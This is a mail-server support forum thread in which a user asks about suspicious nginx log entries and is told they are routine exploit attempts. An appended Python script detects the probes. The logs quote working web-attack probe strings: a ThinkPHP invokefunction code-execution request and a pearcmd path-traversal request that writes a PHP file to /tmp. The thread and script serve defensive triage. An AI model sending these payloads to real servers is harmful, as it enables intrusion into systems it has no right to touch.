1

Topic: Possible exploit?

==== REQUIRED BASIC INFO OF YOUR IREDMAIL SERVER ====
- iRedMail version (check /etc/iredmail-release): iRedMail EE
- Deployed with iRedMail Easy or the downloadable installer? downloadable installer
- Linux/BSD distribution name and version: linux
- Store mail accounts in which backend (LDAP/MySQL/PGSQL): PGSQL
- Web server (Apache or Nginx): Nginx
- Manage mail accounts with iRedAdmin-Pro? yes, EE
- [IMPORTANT] Related original log or error message is required if you're experiencing an issue.
====

Hello,

I am seeing exploit URLs in my nginx access.log file that are showing a 200 return but not finding any created files, do I need to worry about this?

107.172.252.183 - - [07/Jun/2025:17:36:59 -0500] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 5405 "-" "Custom-AsyncHttpClient"

107.172.252.183 - - [07/Jun/2025:17:37:01 -0500] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 200 5434 "-" "Custom-AsyncHttpClient"

107.172.252.183 - - [07/Jun/2025:17:37:02 -0500] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 5340 "-" "Custom-AsyncHttpClient"


2

Re: Possible exploit?

They're exploit attempts, it's normal and safe so far, no worries.

3

Re: Possible exploit?

ZhangHuangbin wrote:

They're exploit attempts, it's normal and safe so far, no worries.

ok, thank you!
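
A triage script for log lines like the ones in the first post, added here as an example; it is not part of the thread and not iRedMail code. It assumes nginx's combined log format with `\xHH` escaping. The signature names, helper names and the fourth (benign) sample line are made up for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample: the three requests quoted in the first post plus one benign line.
SAMPLE_LOG = r'''107.172.252.183 - - [07/Jun/2025:17:36:59 -0500] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 5405 "-" "Custom-AsyncHttpClient"
107.172.252.183 - - [07/Jun/2025:17:37:01 -0500] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 200 5434 "-" "Custom-AsyncHttpClient"
107.172.252.183 - - [07/Jun/2025:17:37:02 -0500] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 5340 "-" "Custom-AsyncHttpClient"
203.0.113.5 - - [07/Jun/2025:17:40:00 -0500] "GET /mail/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"'''

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (.*?) HTTP/[\d.]+" (\d{3}) (\d+)')
# Probe families visible in the thread's log lines (labels are this example's own).
SIGNATURES = {
    "thinkphp-invokefunction": re.compile(r"\\think\\app/invokefunction", re.I),
    "pearcmd-config-create": re.compile(r"pearcmd.*config-create", re.I),
    "traversal-in-parameter": re.compile(r"=(?:\.\./){2,}"),
}
# In a pearcmd config-create probe the last '+'-separated argument is the file to write.
WRITE_TARGET = re.compile(r"\+(/[^+&\s]+)$")

def decode(uri):
    """Undo nginx's \\xHH log escaping, then percent-decoding ('+' is left as is)."""
    uri = re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), uri)
    return unquote(uri)

def triage(log_text):
    """Return one finding per log line that matches a known probe signature."""
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, uri, status, size = m.group(1), decode(m.group(2)), int(m.group(3)), int(m.group(4))
        tags = [name for name, rx in SIGNATURES.items() if rx.search(uri)]
        if not tags:
            continue
        target = WRITE_TARGET.search(uri) if "pearcmd-config-create" in tags else None
        findings.append({"ip": ip, "status": status, "bytes": size, "tags": tags,
                         "write_target": target.group(1) if target else None})
    return findings

def files_to_check(findings):
    """Paths the probes tried to create; look for these on disk."""
    return sorted({f["write_target"] for f in findings if f["write_target"]})

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f)
    print("check for:", files_to_check(triage(SAMPLE_LOG)))
```

The status code in the access log records only that nginx served a response; the `write_target` values are the paths to look for on the server when confirming that nothing was created.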